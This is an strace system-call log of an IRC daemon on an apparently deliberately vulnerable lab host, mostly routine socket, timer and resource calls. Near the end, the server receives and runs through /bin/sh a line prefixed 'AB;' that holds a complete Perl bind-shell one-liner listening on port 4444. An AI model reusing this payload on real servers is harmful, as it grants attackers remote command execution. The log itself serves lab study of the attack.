4519  20:13:40.678963 waitpid(11133, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0) = 11133
4519  20:13:41.018088 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
4519  20:13:41.018114 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
4519  20:13:41.018125 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
4519  20:13:41.018135 --- SIGCHLD (Child exited) @ 0 (0) ---
4519  20:13:41.018161 send(5, ":irc.Metasploitable.LAN 451 AB;perl :You have not registered\r\n", 62, 0) = 62
4519  20:13:41.018230 time(NULL)        = 1495671221
4519  20:13:41.018245 time(NULL)        = 1495671221
4519  20:13:41.018299 gettimeofday({1495671221, 18305}, NULL) = 0
4519  20:13:41.018314 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:13:41.018346 clock_gettime(CLOCK_MONOTONIC, {48030, 835378539}) = 0
4519  20:13:41.018483 gettimeofday({1495671221, 18488}, NULL) = 0
4519  20:13:41.018566 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 3 (in [5 7 9], left {1, 0})
4519  20:13:41.018613 clock_gettime(CLOCK_MONOTONIC, {48030, 835625909}) = 0
4519  20:13:41.018625 recv(9, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\nREHASH\n", 8192, 0) = 78
4519  20:13:41.018664 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018683 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018697 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018712 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018726 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018740 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018754 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018768 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018781 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018795 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018809 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018823 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018836 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018850 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018864 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018878 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018891 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018905 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018919 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018934 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018954 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018970 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.018992 send(9, ":irc.Metasploitable.LAN 481 bla4 :Permission Denied- You do not have the correct IRC operator privileges\r\n", 106, 0) = 106
4519  20:13:41.019020 recv(7, "PRIVMSG  #testit1 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:13:41.019038 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019053 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019067 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019081 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019095 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019116 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019130 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019144 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019158 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019172 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019185 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019199 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019213 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019227 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019240 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019254 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019268 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019282 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019295 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019309 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019323 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019337 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.019353 recv(5, "", 8192, 0) = 0
4519  20:13:41.019365 getsockopt(5, SOL_SOCKET, SO_ERROR, [32], [4]) = 0
4519  20:13:41.019384 send(5, "ERROR :Closing Link: [10.0.2.4] (Broken pipe)\r\n", 47, 0) = -1 EPIPE (Broken pipe)
4519  20:13:41.019401 --- SIGPIPE (Broken pipe) @ 0 (0) ---
4519  20:13:41.019431 close(5)          = 0
4519  20:13:41.019453 gettimeofday({1495671221, 19458}, NULL) = 0
4519  20:13:41.019466 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 290000})
4519  20:13:41.727401 clock_gettime(CLOCK_MONOTONIC, {48031, 544422743}) = 0
4519  20:13:41.727425 recv(4, "PRIVMSG  #testit0 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:13:41.727450 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727469 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727484 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727498 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727512 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727527 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727540 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727554 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727568 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727582 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727595 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727609 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727623 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727637 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727650 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727664 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727678 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727698 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727712 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727726 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727740 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.727754 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.736806 time(NULL)        = 1495671221
4519  20:13:41.736806 time(NULL)        = 1495671221
4519  20:13:41.736806 gettimeofday({1495671221, 736806}, NULL) = 0
4519  20:13:41.736807 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:13:41.736807 clock_gettime(CLOCK_MONOTONIC, {48031, 553815901}) = 0
4519  20:13:41.736807 gettimeofday({1495671221, 736807}, NULL) = 0
4519  20:13:41.736807 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 930000})
4519  20:13:41.816778 clock_gettime(CLOCK_MONOTONIC, {48031, 633786757}) = 0
4519  20:13:41.816778 recv(7, "PRIVMSG  #testit1 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59
4519  20:13:41.816778 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816791 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816806 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816820 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816834 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816848 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816861 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816875 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816888 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816902 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816915 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816928 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816941 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816955 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816969 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816982 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.816995 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.817009 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.817022 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.817036 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.817049 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.817062 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.817079 gettimeofday({1495671221, 817083}, NULL) = 0
4519  20:13:41.817091 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 870000})
4519  20:13:41.946779 clock_gettime(CLOCK_MONOTONIC, {48031, 763787750}) = 0
4519  20:13:41.946779 recv(4, "PRIVMSG  #testit0 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59
4519  20:13:41.946779 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946785 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946800 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946815 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946839 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946853 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946867 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946882 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946895 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946909 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946923 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946936 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946950 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946964 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946978 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.946991 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.947005 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.947019 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.947033 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.947057 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.947107 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.947151 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:41.947167 time(NULL)        = 1495671221
4519  20:13:41.947177 time(NULL)        = 1495671221
4519  20:13:41.947189 gettimeofday({1495671221, 947192}, NULL) = 0
4519  20:13:41.947200 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:13:41.947230 clock_gettime(CLOCK_MONOTONIC, {48031, 764242717}) = 0
4519  20:13:41.947240 gettimeofday({1495671221, 947244}, NULL) = 0
4519  20:13:41.947251 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 940000})
4519  20:13:42.017759 clock_gettime(CLOCK_MONOTONIC, {48031, 834777140}) = 0
4519  20:13:42.017778 accept(2, 0, NULL) = 5
4519  20:13:42.017800 getpeername(5, {sa_family=AF_INET, sin_port=htons(34507), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:13:42.017831 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:13:42.017842 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:13:42.017856 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:13:42.017868 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:13:42.017880 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:13:42.017891 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:13:42.017903 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:13:42.017919 clock_gettime(CLOCK_MONOTONIC, {48031, 834933025}) = 0
4519  20:13:42.017931 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:13:42.017943 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:13:42.017953 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:13:42.017962 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:13:42.017973 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:13:42.017988 send(6, "I+\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:13:42.018048 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:13:42.018069 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70
4519  20:13:42.018146 gettimeofday({1495671222, 18152}, NULL) = 0
4519  20:13:42.018161 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [7], left {1, 0})
4519  20:13:42.018237 clock_gettime(CLOCK_MONOTONIC, {48031, 835265657}) = 0
4519  20:13:42.018307 recv(7, "PRIVMSG  #testit1 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45
4519  20:13:42.018339 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018358 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018373 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018388 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018416 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018467 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018582 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018616 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018692 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018727 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018806 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018841 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018869 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018884 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018898 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018912 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018925 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018939 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.018954 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.019002 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.019035 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.019050 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:42.019081 time(NULL)        = 1495671222
4519  20:13:42.019093 time(NULL)        = 1495671222
4519  20:13:42.019107 gettimeofday({1495671222, 19110}, NULL) = 0
4519  20:13:42.019145 select(1024, [2 6], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:13:42.019193 clock_gettime(CLOCK_MONOTONIC, {48031, 836206038}) = 0
4519  20:13:42.019204 gettimeofday({1495671222, 19207}, NULL) = 0
4519  20:13:42.019214 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})
4519  20:13:42.026978 clock_gettime(CLOCK_MONOTONIC, {48031, 843987006}) = 0
4519  20:13:42.026978 recvfrom(6, "I+\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\372\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:13:42.026978 close(6)          = 0
4519  20:13:42.026979 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:13:42.026979 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104
4519  20:13:42.026979 gettimeofday({1495671222, 26979}, NULL) = 0
4519  20:13:42.026979 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})
4519  20:13:42.026979 clock_gettime(CLOCK_MONOTONIC, {48031, 843988636}) = 0
4519  20:13:42.026980 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:13:42.026980 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:13:42.027000 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:13:42.027013 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:13:42.027029 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 11138
11138 20:13:42.036716 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
11138 20:13:42.036716 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
11138 20:13:42.036717 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11138 20:13:42.036724 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
11138 20:13:42.036838 brk(0)            = 0x80f9000
11138 20:13:42.036861 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.036877 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f93000
11138 20:13:42.036894 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.036912 open("/etc/ld.so.cache", O_RDONLY) = 1
11138 20:13:42.036925 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11138 20:13:42.036944 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8b000
11138 20:13:42.036954 close(1)          = 0
11138 20:13:42.036965 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.036981 open("/lib/libncurses.so.5", O_RDONLY) = 1
11138 20:13:42.036994 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
11138 20:13:42.037099 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
